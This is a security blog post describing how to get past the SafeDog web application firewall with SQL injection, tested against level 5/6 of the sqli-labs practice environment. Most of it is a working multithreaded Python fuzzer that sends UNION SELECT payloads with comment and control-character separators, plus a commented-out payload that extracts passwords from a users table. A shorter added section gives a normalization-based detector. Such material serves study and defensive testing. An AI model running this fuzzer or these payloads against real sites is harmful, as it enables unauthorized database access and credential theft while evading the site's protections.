Bypassing SafeDog with fuzzed SQL injection payloads


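The test environment is level 6 of sqli lab.

The bypass succeeded.

The payload in the code comment successfully returns information that includes table and column names.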

# -*- coding: utf-8 -*-
import threading
from queue import Queue, Empty

import requests

# Candidate separators tried between the UNION and SELECT keywords
fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']
fuzz_sz = ['',' ']
fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]
Fuzz = fuzz_ch + fuzz_sz + fuzz_zs


class fuzz:
    def __init__(self, root, ThreadNum=5):
        # Use the constructor arguments instead of hard-coded values
        self.root = root
        self.ThreadNum = ThreadNum
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) '
                          'AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20',
            'Referer': 'http://www.camel.com',
            'Cookie': 'whoami=digo8',
        }
        self.task = Queue()
        # Queue one URL for every 4-item combination of separators
        for a in Fuzz:
            for b in Fuzz:
                for c in Fuzz:
                    for d in Fuzz:
                        exp = self.root + "' /*!union" + a + b + c + d + "select*/" + " 1,2,3 --+"
                        # Alternative payload:
                        # exp = self.root + "' /*!union" + a + b + c + d + "select*/" + " 1,2,password /*!from " + a + b + c + d + "users*/--+"
                        self.task.put(exp)
        self.s_list = []

    def visit(self, url):
        # Return the response body, or an empty string if the request fails
        try:
            r = requests.get(url, headers=self.headers, timeout=10)
            ret = r.text
        except requests.RequestException:
            print("Fail to connect...")
            ret = ""
        return ret

    def test_url(self):
        # Worker loop: get_nowait() avoids blocking when another thread
        # takes the last item between an empty() check and get()
        while True:
            try:
                url = self.task.get_nowait()
            except Empty:
                break
            ret = self.visit(url)
            # Keep URLs whose response contains the lab page marker and no error text
            if "Dhakkan" in ret and "error" not in ret:
                self.s_list.append(url)
                print(url)

    def work(self):
        threads = []
        for i in range(self.ThreadNum):
            # Pass the method itself; calling it here would run everything
            # in the main thread before any worker starts
            t = threading.Thread(target=self.test_url)
            threads.append(t)
            t.start()
        for t in threads:
            t.join()


obj = fuzz("http://192.168.1.109/sqli/Less-5/?id=1")
obj.work()
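
The fuzzer above only varies what sits between union and select inside a MySQL /*! ... */ executable comment, so a filter that normalizes the query string before matching sees the same statement in every variant. The following is an added defensive example, not code from the original post; the function names and sample query strings are constructed, and the normalization rules are a simplified assumption about what MySQL treats as separators.

```python
import re
from urllib.parse import unquote_plus

# MySQL runs the body of /*! ... */ (optionally /*!50000 ... */) as SQL,
# so only the delimiters are dropped, never the enclosed keywords.
VERSIONED_OPEN = re.compile(r"/\*!\d*")
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
STRAY_CLOSE = re.compile(r"\*/")
UNION_SELECT = re.compile(
    r"\bunion\b(?:\s+(?:all|distinct))?\s*\(?\s*select\b", re.I)


def normalize(raw_query):
    """Reduce a raw query string to roughly what the SQL parser sees."""
    text = unquote_plus(raw_query)          # %0a-%0d become real control chars
    text = VERSIONED_OPEN.sub(" ", text)    # unwrap executable comments
    text = PLAIN_COMMENT.sub(" ", text)     # ordinary comments act as separators
    text = STRAY_CLOSE.sub(" ", text)       # closers left over from unwrapping
    return re.sub(r"\s+", " ", text).strip()  # \s also covers \x0b and \x0c


def is_union_injection(raw_query):
    """True if the normalized query contains a UNION ... SELECT sequence."""
    return bool(UNION_SELECT.search(normalize(raw_query)))


def scan(queries):
    """Return only the query strings flagged after normalization."""
    return [q for q in queries if is_union_injection(q)]


# Constructed sample query strings (not taken from real traffic).
SAMPLES = [
    "id=1%27%20/*!union%0bselect*/%201,2,3%20--+",
    "id=1'+/*!union%0a/**/select*/+1,2,3+--+",
    "id=1&note=student+union+elections",
    "q=select+a+union+card",
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(is_union_injection(q), repr(normalize(q)))
```
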


Copyright notice: unless otherwise stated, all articles here are original work by 《颓废》; please retain the source when reposting.


Permalink: Bypassing SafeDog with fuzzed SQL injection payloads - https://www.0dayhack.com/post-785.html
